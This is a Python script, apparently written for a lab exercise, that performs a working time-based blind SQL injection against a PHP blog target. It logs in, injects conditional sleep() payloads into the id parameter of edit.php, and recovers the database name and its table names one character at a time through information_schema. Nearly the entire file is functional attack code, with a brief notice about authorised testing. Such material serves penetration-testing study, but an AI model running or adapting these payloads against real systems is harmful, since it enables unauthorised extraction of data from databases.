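# -*- coding: utf-8 -*-
# @Time : 2022/6/16 23:45
# @Author : admin
# @Email : 1985264689@qq.com
# @File : timeblind.py
# @Project : project
# @Description : time-based blind SQL injection proof of concept (lab target)
"""Time-based blind SQL injection proof of concept against a lab target.

Flow (the same three stages as the original script):

1. POST the lab credentials to ``login-1.php`` so the session cookie is kept.
2. Inject ``and if(<cond>, sleep(N), 1)`` into the ``id`` parameter of
   ``edit.php`` and time each response: a reply slower than
   ``DELAY_THRESHOLD`` seconds means ``<cond>`` was true.
3. Use that oracle to recover the length and name of the current database
   and the comma-joined list of its table names, one character at a time.

Fixes over the original: MySQL ``substr`` positions are 1-based, so the
table-name loop no longer starts at position 0 (a whole round of requests
that could never match); the table list is sized with ``length()`` first
instead of being cut at a hard-coded 15 characters; every request carries a
timeout so a hung target cannot stall the script forever; intervals are
measured with ``time.monotonic()``; a position no candidate matches is shown
as ``?`` instead of being silently dropped; the builtin ``sum`` is no longer
shadowed.

This is an offensive-testing script: run it only against systems you are
authorised to test.
"""
import time
from typing import Callable, Optional

BASE_URL = 'http://192.168.0.0/learn/blog'
LOGIN_URL = f'{BASE_URL}/login-1.php'
INJECT_URL = f'{BASE_URL}/edit.php'
LOGIN_DATA = {'username': 'admin', 'password': '', 'vcode': '0000'}

# Seconds the injected sleep() runs, and the response time above which a
# probe counts as "condition true". The gap between the two absorbs normal
# latency; on a slow link raise both, or jitter produces false positives.
SLEEP_SECONDS = 3
DELAY_THRESHOLD = 2.0
# Per-request timeout, kept well above SLEEP_SECONDS so a genuine true branch
# is never mistaken for a hang while a dead target still fails fast.
REQUEST_TIMEOUT = 15

# Candidate characters for names. Only lowercase letters are tried, which
# relies on the comparison being case-insensitive under the target's MySQL
# collation — NOTE(review): add uppercase if the target uses a binary collation.
CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789,_'
# Upper bounds on the probed lengths (each probe costs one request).
MAX_DB_NAME_LEN = 15
MAX_TABLE_LIST_LEN = 64

Oracle = Callable[[str], bool]  # maps a SQL condition to "was it true?"


def inject_url(condition: str) -> str:
    """Return the edit.php URL with *condition* wrapped in the sleep oracle.

    The query string is built as a raw string, exactly as the original did,
    so ``requests`` percent-encodes it on the way out and the server sees
    ``id=1 and if(<condition>, sleep(N), 1)``.
    """
    return f'{INJECT_URL}?id=1 and if({condition}, sleep({SLEEP_SECONDS}), 1)'


def is_delayed(elapsed: float, threshold: float = DELAY_THRESHOLD) -> bool:
    """True when a response took at least *threshold* seconds.

    Equivalent to the original ``int(elapsed) >= 2`` for non-negative
    ``elapsed``, minus the truncation.
    """
    return elapsed >= threshold


def make_oracle(session) -> Oracle:
    """Build the timing oracle on top of an authenticated ``requests`` session.

    The returned callable raises ``requests.exceptions.RequestException``
    (including ``Timeout``) when the target cannot be reached. That is
    deliberate: a network failure must never be read as "condition true".
    """
    def ask(condition: str) -> bool:
        start = time.monotonic()  # monotonic: wall-clock jumps cannot skew the interval
        session.get(url=inject_url(condition), timeout=REQUEST_TIMEOUT)
        return is_delayed(time.monotonic() - start)
    return ask


def find_length(ask: Oracle, expression: str, max_len: int) -> Optional[int]:
    """Return ``length(expression)`` if it lies in ``1..max_len``, else ``None``.

    Probes linearly like the original; only the matching probe costs a sleep.
    """
    for n in range(1, max_len + 1):
        if ask(f'length({expression})={n}'):
            return n
    return None


def extract(ask: Oracle, expression: str, length: int, charset: str = CHARSET) -> str:
    """Recover ``length`` characters of ``expression``'s value via the oracle.

    Positions are 1-based, as MySQL's ``substr`` expects. A position for which
    no candidate in ``charset`` matches becomes ``?`` rather than being
    dropped, so the caller can see the result is incomplete.
    """
    chars = []
    for pos in range(1, length + 1):
        for ch in charset:
            if ask(f'substr({expression},{pos},1)="{ch}"'):
                chars.append(ch)
                break
        else:
            chars.append('?')
    return ''.join(chars)


def login():
    """Authenticate against the lab target and return the session keeping its cookie."""
    import requests  # deferred so the pure helpers above import without the dependency
    session = requests.session()
    resp = session.post(url=LOGIN_URL, data=LOGIN_DATA, timeout=REQUEST_TIMEOUT)
    # An HTTP error here would make every later probe meaningless. Note that a
    # 200 does not prove the credentials were accepted; the lab form may
    # answer 200 either way.
    resp.raise_for_status()
    return session


def main() -> None:
    """Run the three extraction stages and print what each recovers."""
    ask = make_oracle(login())

    db_len = find_length(ask, 'database()', MAX_DB_NAME_LEN)
    if db_len is None:
        print(f'database length not found within 1..{MAX_DB_NAME_LEN}; oracle not working?')
        return
    print(db_len)
    print(extract(ask, 'database()', db_len))

    # Scope the table list by database() itself rather than the recovered
    # name, so a '?' in the extracted name cannot break the subquery.
    tables_expr = ('(select group_concat(table_name) from information_schema.tables '
                   'where table_schema = database())')
    tbl_len = find_length(ask, tables_expr, MAX_TABLE_LIST_LEN)
    if tbl_len is None:
        print(f'table list empty or longer than {MAX_TABLE_LIST_LEN} characters')
        return
    print(extract(ask, tables_expr, tbl_len))


if __name__ == '__main__':
    main()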
Python SQL时间型盲注